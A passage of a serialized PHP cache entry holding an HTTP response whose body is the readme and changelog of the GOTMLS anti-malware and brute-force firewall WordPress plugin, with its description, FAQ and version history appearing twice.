definition updates that include WordPress Core files, more improvements to the Brute-Force protection patch (Plus many other improvement from v4.14.X: see Changelog for details).\n\n= 4.14.47 =\nMajor upgrade to the protection for Brute-Force attempts, and a bug fix for resetting the permissions of read-only files (Plus many other improvement from v3.X: see Changelog for details).\n\n= 3.07.06 =\nAdded SSL support for definition updates and upgraded the Whitelist feature (Plus many other improvement from v1.3.X: see Changelog for details).\n\n= 1.3.02.15 =\nImproved security on the Quarantine directory to fix the 500 error on some servers (Plus many other improvement from v1.2.X: see Changelog for details).\n\n= 1.2.03.23 =\nFirst versions available for WordPress (code removed, no longer compatible).\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:0:{}s:8:\"filename\";N;s:13:\"http_response\";O:25:\"WP_HTTP_Requests_Response\":5:{s:11:\"\0*\0response\";O:17:\"Requests_Response\":10:{s:4:\"body\";s:28779:\"=== Anti-Malware Security and Brute-Force Firewall ===\nPlugin URI: http://gotmls.net/\nAuthor: Eli Scheetz\nAuthor URI: http://wordpress.ieonly.com/category/my-plugins/anti-malware/\nContributors: scheeeli, gotmls\nDonate link: https://gotmls.net/donate/\nTags: security, firewall, anti-malware, scanner, automatic, repair, remove, malware, virus, threat, hacked, malicious, infection, timthumb, exploit, block, brute-force, wp-login, patch, antimalware, revslider, Revolution Slider\nVersion: 4.20.72\nStable tag: 4.20.72\nRequires at least: 3.3\nTested up to: 5.7.2\n\nThis Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.\n\n== Description ==\n\n**Features:**\n\n* Download Definition Updates to protect against new threats.\n* Run a Complete Scan to automatically remove known security threats, backdoor scripts, and database injections.\n* Firewall block SoakSoak and other malware from exploiting Revolution Slider and other plugins with known vulnerabilites.\n* Upgrade vulnerable versions of timthumb scripts.\n\n**Premium Features:**\n\n* Patch your wp-login and XMLRPC to block Brute-Force and DDoS attacks.\n* Check the integrity of your WordPress Core files.\n* Automatically download new Definition Updates when running a Complete Scan.\n\nRegister this plugin at [GOTMLS.NET](http://gotmls.net/) and get access to new definitions of \"Known Threats\" and added features like Automatic Removal, plus patches for specific security vulnerabilities like old versions of timthumb. Updated definition files can be downloaded automatically within the admin once your Key is registered. Otherwise, this plugin just scans for \"Potential Threats\" and leaves it up to you to identify and remove the malicious ones.\n\nNOTICE: This plugin make call to GOTMLS.NET to check for updates not unlike what WordPress does when checking your plugins and themes for new versions. Staying up-to-date is an essential part of any security plugin and this plugin can let you know when there are new plugin and definition update available. If you\'re allergic to \"phone home\" scripts then don\'t use this plugin (or WordPress at all for that matter).\n\n**Special thanks to:**\n\n* Clarus Dignus for design suggestions and graphic design work on the banner image.\n* Jelena Kovacevic and Andrew Kurtis of webhostinghub.com for providing the Spanish translation.\n* Marcelo Guernieri for the Brazilian Portuguese translation.\n* Umut Can Alparslan for the Turkish translation.\n\n== Installation ==\n\n1. Download and unzip the plugin into your WordPress plugins directory (usually `/wp-content/plugins/`).\n1. Activate the plugin through the \'Plugins\' menu in your WordPress Admin.\n1. Register on gotmls.net and download the newest definition updates to scan for Known Threats.\n\n== Frequently Asked Questions ==\n\n= Why should I register? =\n\nIf you register on [GOTMLS.NET](http://gotmls.net/) you will have access to download definitions of New Threats and added features like automatic removal of \"Known Threats\" and patches for specific security issues like old versions of timthumb and brute-force attacks on wp-login.php. Otherwise, this plugin only scans for \"Potential Threats\" on your site, it would then be up to you to identify the good from the bad and remove them accordingly. \n\n= How do I patch the Revolution Slider vulnerability? =\n\nEasy, if you have installed and activated my this Anti-Malware plugin on your site then it will automatically block attempts to exploit the Revolution Slider vulnerability.\n\n= How do I patch the wp-login vulnerability? =\n\nThe WordPress Login page is susceptible to a brute-force attack (just like any other login page). These types of attacks are becoming more prevalent these days and can sometimes cause your server to become slow or unresponsive, even if the attacks do not succeed in gaining access to your site. This plugin can apply a patch that will block access to the WordPress Login page whenever this type of attack is detected. Just click the Install Patch button under Brute-force Protection on the Anti-Malware Setting page. For more information on this subject [read my blog](http://gotmls.net/tag/wp-login-php/).\n\n= Why can\'t I automatically remove the \"Potential Threats\" in yellow? =\n\nMany of these files may use eval and other powerful PHP function for perfectly legitimate reasons and removing that code from the files would likely cripple or even break your site so I have only enabled the Auto remove feature for \"Know Threats\".\n\n= How do I know if any of the \"Potential Threats\" are dangerous? =\n\nClick on the linked filename to examine it, then click each numbered link above the file content box to highlight the suspicious code. If you cannot tell whether or not the code is malicious just leave it alone or ask someone else to look at it for you. If you find that it is malicious please send me a copy of the file so that I can add it to my definition update as a \"Know Threat\", then it can be automatically removed.\n\n= What if the scan gets stuck part way through? =\n\nFirst just leave it for a while. If there are a lot of files on your server it could take quite a while and could sometimes appear to not be moving along at all even if it really is working. If it still seems stuck after a while then try running the scan again, be sure you try both the Complete Scan and the Quick scan.\n\n= How did I get hacked in the first place? =\n\nFirst, don\'t take the attack personally. Lots of hackers routinely run automated script that crawl the internet looking for easy targets. Your site probably got hacked because you are unknowingly an easy target. This might be because you are running an older version of WordPress or have installed a Plugin or Theme with a backdoor or known security vulnerability. However, the most common type of infection I see is cross-contamination. This can happen when your site is on a shared server with other exploitable sites that got infected. In most shared hosting environments it\'s possible for hackers to use an one infected site to infect other sites on the same server, sometimes even if the sites are on different accounts.\n\n= What can I do to prevent it from happening again? =\n\nThere is no sure way to protect your site from every kind of hack attempt. That said, don\'t be an easy target. Some basic steps should include: hardening your password, keeping all your sites up-to-date, and run regular scans with Anti-Malware software like [GOTMLS.NET](http://gotmls.net/)\n\n= Why does sucuri.net or the Google Safe Browsing Diagnostic page still say my site is infected after I have removed the malicious code? =\n\nsucuri.net caches their scan results and will not refresh the scan until you click the small link near the bottom of the page that says \"Force a Re-scan\" to clear the cache. Google also caches your infected pages and usually takes some time before crawling your site again, but you can speed up that process by Requesting a Review in the Malware or Security section of [Google Webmaster Tools](https://www.google.com/webmasters/tools/). It is a good idea to have a Webmaster Tools account for your site anyway as it can provide lots of other helpful information about your site.\n\n== Screenshots ==\n\n1. The menu showing Anti-Malware options.\n2. The Scan Setting page in the admin.\n3. An example scan that found some threats.\n4. The results window when \"Automatic Repair\" fixes threats.\n5. The Quarantine showing threats that have been fix already.\n\n== Changelog ==\n\n= 4.20.72 =\n* Updated registration form to be more compatible with newer iframe restrictions.\n* Fixed session check on the Brute-Force patch to no longer need mod_rewrite.\n* Removed older code from WordPress Repository.\n\n= 4.20.59 =\n* Various minor bug fixes.\n* Added Core Files Definitions for ClassicPress.\n* Tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\n* Fixed a JavaScript error caused by a new French translation.\n* Checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\n* Updated some external links.\n* Tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\n* Added even more error handling to the DB Scan for servers with the PHP memory_limit set too low.\n* Modified the Directory Scan Depth to accept 0 as a value to indicate skipping the Directory Scan (use this to focus on the DB Scan).\n* Added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\n* Updated links to use HTTPS by default and fixed some old URLs.\n* Various performance improvements.\n* Added more error handling to the DB Scan.\n* Fixed a few minor bugs causing PHP Notices.\n* Fixed a path search to work on Windows servers.\n* Tweaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\n* Cleaned up the Nonce Token creation and storage functions.\n* Cleaned up View Quarantine page and fixed recovery link.\n* Added debugging for login errors WP head and footer Hooks.\n\n= 4.18.74 =\n* Fixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\n* Added wp_options table to the db_scan.\n* Fixed a few minor bugs in the db scan quarantine view.\n* Changed some wording and other minor fomatting issues.\n* Checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\n* Added a Warning message about the vulnerability in the yuzo-related-post plugin.\n* Updated the Quarantine interface and added a re-scan / re-clean feature.\n* Fixed a bug in the scan depth array that would produce PHP Notices in the error_log files under certain conditions.\n* Changed some wording and other minor fomatting issues.\n* Removed some outdated JavaScript that is no longer needed.\n* Checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\n* Fixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\n* Fixed a bug in the Firewall that prevented some iPad devices from logging in.\n* Fixed an encoding bug that prevented the Examine File window from dispaying some file formats.\n* Restored the File Details window in the Examine File window.\n* Updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\n* Added a whole new DB Scan category that looks for links and scripts injected directly into the database content and removes them.\n* Updated Firewall landing page for HTTPS compatibility.\n* Removed some old code that was no longer needed.\n* Added a feature to clear cache files before running the Complete Scan, this will speed up the scan and prevent malware from being saved on your cached paged.\n* Updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\n* Updated code for compatibility with WP 4.9.8 (latest release).\n* Fixed PHP Notice for the unknown offset of SERVER_parts.\n* Escaped single-quotes in translated strings for use within JavaScript.\n\n= 4.17.68 =\n* Updated code for compatibility with WP 4.9.7 (latest release).\n* Removed wrong size dashicon from Settings link in plugin list.\n* Removed the broken link to vote WORKS on wordpress.org.\n* Reordered priorety on fixing Known Threats to be more efficient.\n\n= 4.17.58 =\n* Updated code for compatibility with WP 4.9.4 (latest release).\n* Fixed dashicons sizing in css.\n* Add ability to update registration email from within the plugin settings.\n* Cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\n* Updated code for compatibility with WP 4.9.3 (latest release).\n* Fixed registration form and alternate domain for definition updates to work on HTTPS.\n* Fixed the wording on the Title check error message.\n\n= 4.17.44 =\n* Added Title check to make sure it does say you were hacked.\n* Updated code for compatibility with WP 4.8.3 (latest release).\n* Fixed Undefined variable error in Quarantine.\n* Fixed XSS vulnerability in nonce error output.\n\n= 4.17.29 =\n* Changed the definition update URL to only use SSL when required.\n* Updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\n* Added the Turkish translation thanks to Umut Can Alparslan.\n* Improved the auto update so that old definitions could be phased out and new threat types would be selected by default.\n* Fixed the admin username change feature on multisite installs.\n* Fixed the details window so that it scrolls to the highlighted code.\n* Set defaults to disable the Potential Threat scan if other threats definitions are enabled.\n* Encoded definitions array for DB storage.\n* Fixed syntax error in the XMLRPC patch for newer versions of Apache.\n* Added fall-back to manual updates if the Automatic update feature fails.\n* Fixed PHP Notices about undefined variable added in last Version release.\n* Improved Apache version detection.\n* Changed Automatic update feature to automatically download all definitions and firewall updates.\n* Added PHP and Apache version detections and changed the XMLRPC patch to work with Apache 2.4 directives.\n* Removed the onbeforeunload function because Norton detected it as a False Positive.\n* Removed code that was deprecated in PHP Version 7.\n* Fixed PHP Notice about an array to string conversion with some rare global variable conditions.\n* Added more firewall options.\n* Moved Scan Log from the Quarantine page to the main Setings page.\n* Fixed PHP Warning about an invalid argument in foreach and some other bugs too.\n* Fixed \"What to look for\" Options so that changes are saved.\n* Changed get_currentuserinfo to wp_get_current_user because the get_currentuserinfo function was deprecated in WP 4.5\n\n= 4.16.17 =\n* Removed Menu Item Placement Options because the add_object_page function was deprecated in WP 4.5.\n* Added firewall options for better compatibility with WP Firewall 2.\n* Fixed an XSS vulnerability in the debug output of the nonce token.\n* Moved the Firewall Options to it\'s own page linked to from the admin menu.\n* Moved the Quick Scan from the admin menu to the top of the Scan Settings page.\n* Fixed PHP Warning about in_array function expecting parameter 2 to be an array, found by Georgey B.\n* Made a few minor cosmetic changes and fixed a few other small bugs in the interface.\n* Fixed the Nonce Token error caused by W3 Total Cache breaking the set_transient function in WordPress.\n* Added the Brazilian Portuguese language files, thanks to Marcelo Guernieri for the translation.\n* Fixed the admin menu and also some links that did not work on Windows server.\n* Added Core Files to the Quick Scan list on the admin menu.\n* Added a nonce token to prevent Cross-Site Request Forgery by admins who are logged-in from another site.\n* Hardened against XSS vulnerability triggered by the file names being scanned (thanks to Mahadev Subedi).\n* Improved brute-force patch compatibility with alternate wp-config.php location.\n* Had to remove the encoding of the Default Definitions to meet the WordPress Plugin Guidelines.\n* Improved the JavaScript in the new Brute-Force login patch so that it works with caching enabled on the login page.\n* Improved the Brute-Force login patch with custom fields and JavaScript. \n* Added a Save button to that Scan Settings page.\n* Fixed a bug in the XMLRPC Patch \"Unblock\" feature.\n* Added a link to purge the deleted Quarantine items from the database.\n* Added firewall option to Block all XMLRPC calls.\n* Fixed a few cosmetic bugs in the quarantine and firewall options.\n* Fixed a bugs in the Quarantine that was memory_limit errors if there number of files in the was too high.\n* Added the highlight malicious code feature back to the Quarantine file viewer.\n* Added the ability to change the admin username if the current username is \"admin\".\n* Improved the code in the Brute-Force Protection patch.\n* Fixed a few bugs in the Core Files Check that was preventing it from fixing some unusual file modifications.\n* Fixed a major bug that made multisite scan extremely slow and sometimes error out.\n* Moved all ajax call out of the init function and into their own functions for better handling time.\n* Moved the quarantine files into the database and deleted the old directory in uploads.\n* Fixed some minor formatting issues in the HTML output on the settings page.\n* Added a warning message if base64_decode has been disabled.\n* Hardened against injected HTML content by encoding the tags with variables.\n* Fixed debug option to exclude individual definitions.\n* Hardened admin_init with current_user_can and realpath on the quarantine file deletion (thanks to J.D. Grimes).\n* Fixed another XSS vulnerabilities in the admin (thanks to James H.)\n* Hardened against XSS vulnerabilities in the admin (thanks to Tim Coen).\n* Added feature to restore default settings for Exclude Extensions.\n* Changed the encoding on the index.php file in the Quarantine to make it more human-readable.\n* Fixed a few small bugs that were throwing PHP Notices in some configurations and added more info to some error messages.\n* Extended execution_time during the Fix process to increase the number of files that could be fixed at a time.\n* Added a Quarantine log to the database.\n* Fixed a couple of minor bugs that would throw PHP notices.\n\n= 4.15.16 =\n* Created an automatic update feature that downloads any new definition updates before starting the scan.\n* Added WordPress Core files to the new definitions update process and included a scan option to check the integrity of the Core files.\n* Automatically whitelisted the unmodified WordPress Core files.\n* Made more improvements to the Brute-Force protection patch and other minor cosmetic changes to the interface.\n* Protected the HTML in my plugin from filter injections and fixed a few other minor bugs.\n* Fixed a problem with deleting files from the Quarantine folder.\n* Added a descriptive reason to the error displayed if the fix was unsuccessful.\n* Added link to restore the default location of the Examine Results window.\n* Improved the encoding of definition updates so that they would not be blocked by poorly written firewall rules.\n* Suppressed the \"Please make a donation\" nag if the fix was unsuccessful, to avoid confusion over premium services.\n* Removed debug alert from initial session check.\n* Improved rewrite compatibility of session check for the Brute-Force Protection Installation.\n* Improved session check for the option to Install Brute-Force Protection and added an error message on failure.\n* Improved support for Multisite by only allowing Network Admins access to the Anti-Malware menu.\n* Added link to view a simple scan history on the Quarantine page.\n* Updated firewall to better protect agains new variations of the RevSlider Exploit.\n* Improved check for session support before giving the option to Install Brute-Force patch.\n* Added option to skip scanning the Quarantined files.\n* Updated Brute-Force patch to fix the problem of being included more that once.\n* Fixed a few minor bugs (better window positioning and css, cleaner results page, updated new help tab, etc.).\n* Made sure that the plugin does not check my servers for updates unless you have registered (this opt-in requirement is part of the WordPress Repository Guidelines).\n* Added exception for the social.png files to the skip files by extension list.\n* Fixed removal of Known Threats from files in the Quarantine directory.\n* Block SoakSoak and other malware from exploiting the Slider Revolution Vulnerability (THIS IS A WIDESPREAD THREAT RIGHT NOW).\n* Enabled the Brute-Force protection option directly from the Settings page.\n* Fixed window position to auto-adjust on small screens.\n\n= 4.14.47 =\n* Major upgrade to the protection for wp-login.php Brute-Force attempts.\n* Fixes a bug in setting the permissions for read-only files so that they could still be cleaned.\n* Fixes a minor bug with pass-by-reference which raises a fatal error in PHP v5.4.\n* Enhanced the Examine File window with better styles and more info.\n* Changed form submission of encrypted file lists to array values instead of keys.\n* Fixes other minor bugs.\n* Made the Examine File window sizable.\n* Fixed a few small bugs and removed some old code.\n* Added a link to my new twitter account.\n* Re-purposed Quick Scan to just scan the most affected areas.\n* Set the registration form to display by defaulted in the definition update section.\n* Fixed a few small bugs in advanced features and directory depth determination.\n* Fixed a session bug to display the last directory scanned.\n* Fixed a few small cosmetic bugs for WP 3.8.\n* Added Spanish translation, thanks to Jelena Kovacevic and Andrew Kurtis at webhostinghub.com.\n* Updated string in the code and added a .pot file to be ready for translation into other languages.\n* Added \"Select All\" checkbox to Quarantine and a new button to delete items from the Quarantine.\n* Added a trace.php file for advanced session tracking.\n* Fixed undefined index bug with menu_group item in settings array.\n* Added support for multisite network admin menu and the ability to restrict admin access.\n* Fixed a session bug in the progress bar related to the last release.\n* Fixed a session bug that conflicted with jigoshop. (Thanks dragonflyfla)\n* Fixed a few bug in the Whitelist definition feature.\n\n= 3.07.06 =\n* Added SSL support for definition updates and registration form.\n* Upgraded the Whitelist feature so the it could not contain duplicates.\n* Downgraded the WP-Login threat and changed it to an opt-in fix.\n* Fixed a bug in the Add to Whitelist feature so the you do not need to update the definitions after whitelisting a file.\n* Added ability to whitelist files.\n* Fixed a major bug in yesterdays release broke the login page on some sites.\n* Added a patch for the wp-login.php brute force attack that has been going around.\n* Created a process to restore files from the Quarantine.\n* Fixed a few other small bugs including path issues on Winblows server.\n\n= 1.3.02.15 =\n* Improved security on the Quarantine directory to fix the 500 error on some servers.\n* Fixed count of Quarantined items.\n* Added htaccess security to the Uploads directory.\n* Linked the Quarantined items to the File Examiner.\n* Added a scan category for Backdoor Scripts.\n* Consolidated the Definition Types and added a Whitelist category.\n* Completely redesigned the Definition Updates to handle incremental updates.\n* Added \"View Quarantine\" to the menu.\n* Enhanced Output Buffer to work with compression enabled (like ob_gzhandler).\n* Moved the quarantine to the uploads directory to protect against blanket inclusion.\n* Fixed Output Buffer issue for when ob_start has already been called.\n* Enhanced the Automatic Fix process to handle bad directory permissions.\n* Added more detailed error messages for different types of file errors.\n* Improved overall error handling.\n* Minor UI enhancements and a few bug fixes.\n* Completely revamped the scan engine to handle large file systems with better error handling.\n* Enhanced the results for the Automatic Fix process.\n* Fixed a few other small bugs.\n* Enhanced the iFrame for the File Viewer and Automatic Fix process.\n* Improved error handling during the scan.\n* Moved the File Viewer and Automatic Fix process into an iFrame to decrease scan time and memory usage.\n* Enhanced the Automatic Fix process for better success with read-only files.\n* Improved code cleanup process and general efficiency of the scan.\n* Encoded definition update for better compatibility with some servers that have post limitation.\n* Fixed XSS vulnerability.\n* Changed registration to allow for multiple sites/keys to be registered under one user/email.\n* Changed auto-update path to update threat level array for all new definition updates.\n* Updated timthumb replacement patch to version 2.8.10 per WordPress.org plugins requirement.\n* Fixed option to exclude directories so that the scan would not get stuck if omitted.\n* Added support for winblows servers using BACKSLASH directory structures.\n* Changed definition updates to write to the DB instead of a file.\n\n= 1.2.03.23 =\n* First versions available for WordPress (code removed, no longer compatible).\n\n== Upgrade Notice ==\n\n= 4.20.72 =\nUpdated registration form, fixed session check, and removed older code from WordPress Repository.\n\n= 4.20.59 =\nVarious minor bug fixes, added Core Files Definitions for ClassicPress, and tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\nFixed a JavaScript error caused by a new French translation and checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\nUpdated some external links and tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\nAdded even more error handling to the DB Scan for low memory_limit, modified the Directory Scan Depth to accept 0 as way to skip the Directory Scan, and added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\nUpdated links, added more error handling to the DB Scan, various performance improvements, fixed path to work on Windows servers and a few minor bugs causing PHP Notices, and weaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\nCleaned up the Nonce Token code and Quarantine page, fixed recovery link, and added debugging for login errors plus WP head and footer Hooks.\n\n= 4.18.74 =\nFixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\nAdded wp_options table to the db_scan and fixed a few minor bugs in the quarantine view, and changed some wording and checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\nAdded a Warning message about the vulnerability in the yuzo-related-post plugin,  updated the Quarantine interface with a re-scan / re-clean feature, fixed a bug in the scan depth array that would produce PHP Notices, changed some wording and other minor fomatting issues, and checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\nFixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\nFixed a few minor bugs and updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\nAdded a whole new DB Scan category, updated Firewall landing page, removed some old code that was no longer needed, clear cache files before running the Complete Scan,, and updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\nUpdated code for compatibility with WP 4.9.8, fixed PHP Notice and escaped single-quotes in translated strings.\n\n= 4.17.68 =\nUpdated code for compatibility with WP 4.9.7, removed dashicon from Settings link and the broken vote WORKS link, and reordered priorety on fixing Known Threats.\n\n= 4.17.58 =\nUpdated code for compatibility with WP 4.9.4, fixed dashicons sizing in css, add ability to update registration email from within the plugin settings, and cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\nUpdated code for compatibility with WP 4.9.3, fixed registration form and alternate domain for definition updates to work on HTTPS, and fixed the wording on the Title Check error message.\n\n= 4.17.44 =\nAdded Title check to make sure it does say you were hacked, updated code for compatibility with WP 4.8.3 and fixed Undefined variable error in Quarantine and an XSS vulnerability in nonce error output.\n\n= 4.17.29 =\nChanged the definition update URL to only use SSL when required, and updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\nAdded the Turkish translation thanks to Umut Can Alparslan, improved the auto update feature, and fixed the admin username change feature on multisite installs (Plus many other improvement from v4.16.X: see Changelog for details).\n\n= 4.16.17 =\nRemoved Menu Item Placement Options that were deprecated in WP 4.5, Added firewall options for better compatibility with WP Firewall 2, and fixed an XSS vulnerability in the debug output of the nonce token (Plus many other improvement from v4.15.X: see Changelog for details).\n\n= 4.15.16 =\nCreated automatic definition updates that include WordPress Core files, more improvements to the Brute-Force protection patch (Plus many other improvement from v4.14.X: see Changelog for details).\n\n= 4.14.47 =\nMajor upgrade to the protection for Brute-Force attempts, and a bug fix for resetting the permissions of read-only files (Plus many other improvement from v3.X: see Changelog for details).\n\n= 3.07.06 =\nAdded SSL support for definition updates and upgraded the Whitelist feature (Plus many other improvement from v1.3.X: see Changelog for details).\n\n= 1.3.02.15 =\nImproved security on the Quarantine directory to fix the 500 error on some servers (Plus many other improvement from v1.2.X: see Changelog for details).\n\n= 1.2.03.23 =\nFirst versions available for WordPress (code removed, no longer compatible).\n\";s:3:\"raw\";s:29059:\"HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 22 Sep 2021 12:59:49 GMT\r\nContent-Type: text/plain\r\nContent-Length: 28779\r\nConnection: close\r\nLast-Modified: Tue, 15 Jun 2021 18:40:25 GMT\r\nETag: \"2548470//gotmls/trunk/readme.txt\"\r\nCache-Control: max-age=604800\r\nAccept-Ranges: bytes\r\n\r\n=== Anti-Malware Security and Brute-Force Firewall ===\nPlugin URI: http://gotmls.net/\nAuthor: Eli Scheetz\nAuthor URI: http://wordpress.ieonly.com/category/my-plugins/anti-malware/\nContributors: scheeeli, gotmls\nDonate link: https://gotmls.net/donate/\nTags: security, firewall, anti-malware, scanner, automatic, repair, remove, malware, virus, threat, hacked, malicious, infection, timthumb, exploit, block, brute-force, wp-login, patch, antimalware, revslider, Revolution Slider\nVersion: 4.20.72\nStable tag: 4.20.72\nRequires at least: 3.3\nTested up to: 5.7.2\n\nThis Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.\n\n== Description ==\n\n**Features:**\n\n* Download Definition Updates to protect against new threats.\n* Run a Complete Scan to automatically remove known security threats, backdoor scripts, and database injections.\n* Firewall block SoakSoak and other malware from exploiting Revolution Slider and other plugins with known vulnerabilites.\n* Upgrade vulnerable versions of timthumb scripts.\n\n**Premium Features:**\n\n* Patch your wp-login and XMLRPC to block Brute-Force and DDoS attacks.\n* Check the integrity of your WordPress Core files.\n* Automatically download new Definition Updates when running a Complete Scan.\n\nRegister this plugin at [GOTMLS.NET](http://gotmls.net/) and get access to new definitions of \"Known Threats\" and added features like Automatic Removal, plus patches for specific security vulnerabilities like old versions of timthumb. Updated definition files can be downloaded automatically within the admin once your Key is registered. Otherwise, this plugin just scans for \"Potential Threats\" and leaves it up to you to identify and remove the malicious ones.\n\nNOTICE: This plugin make call to GOTMLS.NET to check for updates not unlike what WordPress does when checking your plugins and themes for new versions. Staying up-to-date is an essential part of any security plugin and this plugin can let you know when there are new plugin and definition update available. If you\'re allergic to \"phone home\" scripts then don\'t use this plugin (or WordPress at all for that matter).\n\n**Special thanks to:**\n\n* Clarus Dignus for design suggestions and graphic design work on the banner image.\n* Jelena Kovacevic and Andrew Kurtis of webhostinghub.com for providing the Spanish translation.\n* Marcelo Guernieri for the Brazilian Portuguese translation.\n* Umut Can Alparslan for the Turkish translation.\n\n== Installation ==\n\n1. Download and unzip the plugin into your WordPress plugins directory (usually `/wp-content/plugins/`).\n1. Activate the plugin through the \'Plugins\' menu in your WordPress Admin.\n1. Register on gotmls.net and download the newest definition updates to scan for Known Threats.\n\n== Frequently Asked Questions ==\n\n= Why should I register? =\n\nIf you register on [GOTMLS.NET](http://gotmls.net/) you will have access to download definitions of New Threats and added features like automatic removal of \"Known Threats\" and patches for specific security issues like old versions of timthumb and brute-force attacks on wp-login.php. Otherwise, this plugin only scans for \"Potential Threats\" on your site, it would then be up to you to identify the good from the bad and remove them accordingly. \n\n= How do I patch the Revolution Slider vulnerability? =\n\nEasy, if you have installed and activated my this Anti-Malware plugin on your site then it will automatically block attempts to exploit the Revolution Slider vulnerability.\n\n= How do I patch the wp-login vulnerability? =\n\nThe WordPress Login page is susceptible to a brute-force attack (just like any other login page). These types of attacks are becoming more prevalent these days and can sometimes cause your server to become slow or unresponsive, even if the attacks do not succeed in gaining access to your site. This plugin can apply a patch that will block access to the WordPress Login page whenever this type of attack is detected. Just click the Install Patch button under Brute-force Protection on the Anti-Malware Setting page. For more information on this subject [read my blog](http://gotmls.net/tag/wp-login-php/).\n\n= Why can\'t I automatically remove the \"Potential Threats\" in yellow? =\n\nMany of these files may use eval and other powerful PHP function for perfectly legitimate reasons and removing that code from the files would likely cripple or even break your site so I have only enabled the Auto remove feature for \"Know Threats\".\n\n= How do I know if any of the \"Potential Threats\" are dangerous? =\n\nClick on the linked filename to examine it, then click each numbered link above the file content box to highlight the suspicious code. If you cannot tell whether or not the code is malicious just leave it alone or ask someone else to look at it for you. If you find that it is malicious please send me a copy of the file so that I can add it to my definition update as a \"Know Threat\", then it can be automatically removed.\n\n= What if the scan gets stuck part way through? =\n\nFirst just leave it for a while. If there are a lot of files on your server it could take quite a while and could sometimes appear to not be moving along at all even if it really is working. If it still seems stuck after a while then try running the scan again, be sure you try both the Complete Scan and the Quick scan.\n\n= How did I get hacked in the first place? =\n\nFirst, don\'t take the attack personally. Lots of hackers routinely run automated script that crawl the internet looking for easy targets. Your site probably got hacked because you are unknowingly an easy target. This might be because you are running an older version of WordPress or have installed a Plugin or Theme with a backdoor or known security vulnerability. However, the most common type of infection I see is cross-contamination. This can happen when your site is on a shared server with other exploitable sites that got infected. In most shared hosting environments it\'s possible for hackers to use an one infected site to infect other sites on the same server, sometimes even if the sites are on different accounts.\n\n= What can I do to prevent it from happening again? =\n\nThere is no sure way to protect your site from every kind of hack attempt. That said, don\'t be an easy target. Some basic steps should include: hardening your password, keeping all your sites up-to-date, and run regular scans with Anti-Malware software like [GOTMLS.NET](http://gotmls.net/)\n\n= Why does sucuri.net or the Google Safe Browsing Diagnostic page still say my site is infected after I have removed the malicious code? =\n\nsucuri.net caches their scan results and will not refresh the scan until you click the small link near the bottom of the page that says \"Force a Re-scan\" to clear the cache. Google also caches your infected pages and usually takes some time before crawling your site again, but you can speed up that process by Requesting a Review in the Malware or Security section of [Google Webmaster Tools](https://www.google.com/webmasters/tools/). It is a good idea to have a Webmaster Tools account for your site anyway as it can provide lots of other helpful information about your site.\n\n== Screenshots ==\n\n1. The menu showing Anti-Malware options.\n2. The Scan Setting page in the admin.\n3. An example scan that found some threats.\n4. The results window when \"Automatic Repair\" fixes threats.\n5. The Quarantine showing threats that have been fix already.\n\n== Changelog ==\n\n= 4.20.72 =\n* Updated registration form to be more compatible with newer iframe restrictions.\n* Fixed session check on the Brute-Force patch to no longer need mod_rewrite.\n* Removed older code from WordPress Repository.\n\n= 4.20.59 =\n* Various minor bug fixes.\n* Added Core Files Definitions for ClassicPress.\n* Tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\n* Fixed a JavaScript error caused by a new French translation.\n* Checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\n* Updated some external links.\n* Tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\n* Added even more error handling to the DB Scan for servers with the PHP memory_limit set too low.\n* Modified the Directory Scan Depth to accept 0 as a value to indicate skipping the Directory Scan (use this to focus on the DB Scan).\n* Added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\n* Updated links to use HTTPS by default and fixed some old URLs.\n* Various performance improvements.\n* Added more error handling to the DB Scan.\n* Fixed a few minor bugs causing PHP Notices.\n* Fixed a path search to work on Windows servers.\n* Tweaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\n* Cleaned up the Nonce Token creation and storage functions.\n* Cleaned up View Quarantine page and fixed recovery link.\n* Added debugging for login errors WP head and footer Hooks.\n\n= 4.18.74 =\n* Fixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\n* Added wp_options table to the db_scan.\n* Fixed a few minor bugs in the db scan quarantine view.\n* Changed some wording and other minor fomatting issues.\n* Checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\n* Added a Warning message about the vulnerability in the 